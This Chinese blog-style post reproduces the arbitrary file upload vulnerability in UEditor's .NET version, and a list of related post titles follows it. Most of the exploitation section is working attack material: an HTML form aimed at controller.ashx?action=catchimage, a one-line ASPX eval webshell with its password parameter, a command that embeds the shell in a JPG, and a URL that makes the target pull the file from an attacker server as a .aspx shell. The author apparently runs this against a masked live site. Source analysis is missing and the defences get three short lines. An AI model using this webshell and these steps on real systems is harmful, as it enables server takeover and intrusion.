UEditor .Net版本任意文件上传漏洞复现
目录
漏洞背景
漏洞影响
漏洞利用
漏洞分析
防御措施
漏洞背景
UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器
漏洞影响
该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。
漏洞利用
首先准备一个html文件用来做post提交
<form action="http://www.xxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>
action处填写网站controller.ashx
的路径
另外:enctype="application/x-www-form-urlencoded"什么意思?
打开html后如下
这个时候我们需要一台服务器用来放图片木马,服务器可以去阿里云、华为云等申请免费的
我们准备一张2.jpg
的图片跟一个小马3.aspx
,小马代码如下
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
用cmd
命令合成图片木马
copy 2.jpg/b + 3.aspx/a 1.jpg
我们把此木马上传到我们的服务器,记住服务器图片路径
在之前的shell addr
里填写如下参数
http://x.x.x.x/1.jpg?.aspx
http://x.x.x.x/1.jpg
是我们服务器的地址后面跟.aspx
以生成aspx文件,提交后页面如下
按理来说我们上传的文件路径应该如下
http://www.xxx.com/ueditor/net/upload/2206/2206-63790xxxxxxx0006134716.aspx
但链接了下不行,后来知道是服务器源码被改了
这里路径是碰巧猜到的,正常应该是带前缀的
这里给去了,所以木马路径应该是
http://www.xxx.com/upload/2206/2206-63790xxxxxxx0006134716.aspx
我发现服务器已经被人入侵了,且留下了后门,我猜测是之前入侵的人改的源码
漏洞分析
UEditor在抓取远程数据源的时,会进入"catchimage"分支
漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。
java不会啊,没法分析源码,等我学习完后再补充吧
防御措施
1.修改工程目录下net/App_Code/CrawlerHandler.cs文件,添加对文件类型检查的代码。 2.使用各类WAF软件,防止攻击者上传恶意文件。 3.检查文件上传路径下是否有近期上传的畸形图片;检查是否存在asp,aspx等类型危险文件。如果发现异常文件,请判断后及时删除。
UEditor .Net版本任意文件上传漏洞复现相关推荐
- UEditor .Net版本任意文件上传漏洞复现总结
UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近 ...
- 畅捷通T+ v17任意文件上传漏洞复现
1.前言 8月29晚上就开始收到通知,让我们来排查一下是否有使用畅捷通的系统,说是疑似0day导致很多用户被植入勒索病毒,一时间风头十足.第二天很多平台都更新的防护策略,本次漏洞是任意文件上传漏洞,如 ...
- 用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用
1.漏洞概述 用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件.用友 GRP-U8 U8AppProx ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
- 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
- CVE-2022-29464 WSO2 任意文件上传漏洞复现
目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: vulfocus搭建: 0x06 漏洞复现: 1.EXP利用: 2.Burp改包: 0x07 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...
- php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞
事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...
- 任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞
发布日期:2012-11-28 更新日期:2012-12-04 受影响系统: ozerov BigDump 0.29b 描述: ------------------------------------ ...
最新文章
- 当上 CTO 才发现:程序员时常犯的 4 个错误有多可怕!
- uniapp商城_【程序源代码】商城小程序
- css 控制溢出文本显示省略号效果
- 有没有词匹配算法_Google Ads 再次扩展了关键字变量匹配
- 在sql中将表建在别的构件中用什么语句_SQL实战
- 【JAVA】 02-Java对象细节
- 美丽联合与腾讯云签署战略协议 全面借助腾讯云打造智慧时尚电商平台
- 账号密码数据库加密说明
- Windows Print Spooler 被曝未修复 0day,可导致恶意软件以管理员权限运行
- el-menu实现路由跳转及当前页的导航
- ObjectiveC开发教程--如何判断字符串是否为空的方法
- 7个详细步骤教程学会大学生静态网页设计与制作
- JAVA操作FTP(FTP工具类)
- 快速傅里叶变换(FFT)学习
- GD32f103ret6 使用HID,设备管理里,提示未知设备
- ArcGis 加载tif,tpk,shp格式文件
- arduino八段数码管使用
- 在线作图丨差异分析——ANOSIM相似性分析
- win7安装vmware+ubuntu16.04
- U盘重装系统-非常简单制作方法